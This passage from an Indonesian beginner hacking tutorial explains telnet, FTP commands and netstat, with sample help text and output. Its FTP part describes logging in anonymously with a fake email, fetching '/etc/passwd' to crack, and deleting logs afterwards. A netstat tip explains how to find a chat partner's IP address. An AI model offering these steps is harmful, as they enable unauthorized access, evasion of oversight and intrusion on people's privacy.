Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti  inilah yang saya dapatkan.




Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

*************
Newbie tip: Dengan cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut. *************

Read More